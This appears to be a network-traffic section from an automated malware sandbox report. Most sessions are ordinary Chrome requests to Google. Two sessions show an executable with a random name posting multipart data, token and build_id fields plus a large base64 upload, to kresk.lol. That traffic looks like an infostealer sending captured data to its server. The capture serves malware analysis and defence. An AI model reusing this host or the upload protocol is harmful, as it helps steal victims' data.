                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 38 2c 33 37 30 31 33 38 34 2c 31 30 32 31 31 38 39 33 39 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77
                                                                                                                                                                      Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700308,3701384,102118939],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window
                                                                                                                                                                      2024-12-04 16:04:44 UTC437INData Raw: 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73
                                                                                                                                                                      Data Ascii: Array(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this
                                                                                                                                                                      2024-12-04 16:04:44 UTC371INData Raw: 31 36 63 0d 0a 5c 22 29 2c 49 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 49 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 48 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4e 64 28 5f 2e 4a 64 3f 5f 2e 4a 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 53 64 2c
                                                                                                                                                                      Data Ascii: 16c\"),Id(\"mailto\"),Id(\"ftp\"),new _.Hd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Nd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Od\u003dnew _.Nd(_.Jd?_.Jd.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Sd,
                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 38 30 30 30 0d 0a 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 3b 61 5c 75 30 30 33 64 2b 61 7d 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 52 64 29 72 65 74 75 72 6e 20 61 3b 74 72 79 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 63 5c 75 30 30 33 64 5c 75
                                                                                                                                                                      Data Ascii: 8000if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\"string\"){if(!a)return;a\u003d+a}if(typeof a\u003d\u003d\u003d\"number\")return Number.isFinite(a)?a|0:void 0};Sd\u003dfunction(){let a\u003dnull;if(!Rd)return a;try{const b\u003dc\u003d\u
                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 2c 63 29 7d 3b 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 76 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 67 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 52 64 5c 75 30 30 33 64 5f 2e 4a 64 3b 5f 2e 56 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 59 64 5c 75 30 30 33 64 2f 5e 5c 5c 73 2a 28 3f 21 6a 61 76 61 73 63 72 69 70 74 3a 29 28 3f 3a 5b 5c 5c 77 2b 2e
                                                                                                                                                                      Data Ascii: ,c)};_.ee\u003dfunction(a,b,c\u003d0){return _.vb(_.S(a,b),c)};_.ge\u003dfunction(a,b){return a.lastIndexOf(b,0)\u003d\u003d0};Rd\u003d_.Jd;_.Vd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};Yd\u003d/^\\s*(?!javascript:)(?:[\\w+.


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      13192.168.2.449752142.250.181.684435020C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:43 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      2024-12-04 16:04:44 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                      Version: 702228742
                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:44 GMT
                                                                                                                                                                      Server: gws
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      2024-12-04 16:04:44 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                      Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                      2024-12-04 16:04:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      14192.168.2.449764159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:48 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CB1DTR9ZC2V37Q1VKXBS
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 505
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:48 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 31 44 54 52 39 5a 43 32 56 33 37 51 31 56 4b 58 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 31 44 54 52 39 5a 43 32 56 33 37 51 31 56 4b 58 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 31 44 54 52 39 5a 43 32 56 33 37 51 31 56 4b 58 42 53 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------CB1DTR9ZC2V37Q1VKXBSContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------CB1DTR9ZC2V37Q1VKXBSContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------CB1DTR9ZC2V37Q1VKXBSCont
                                                                                                                                                                      2024-12-04 16:04:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:49 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:04:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      15192.168.2.449765159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:49 UTC319OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----7QQIMOZMYUSRQI58G4WT
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 213453
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 37 51 51 49 4d 4f 5a 4d 59 55 53 52 51 49 35 38 47 34 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 4d 4f 5a 4d 59 55 53 52 51 49 35 38 47 34 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 4d 4f 5a 4d 59 55 53 52 51 49 35 38 47 34 57 54 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------7QQIMOZMYUSRQI58G4WTContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------7QQIMOZMYUSRQI58G4WTContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------7QQIMOZMYUSRQI58G4WTCont
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
                                                                                                                                                                      Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
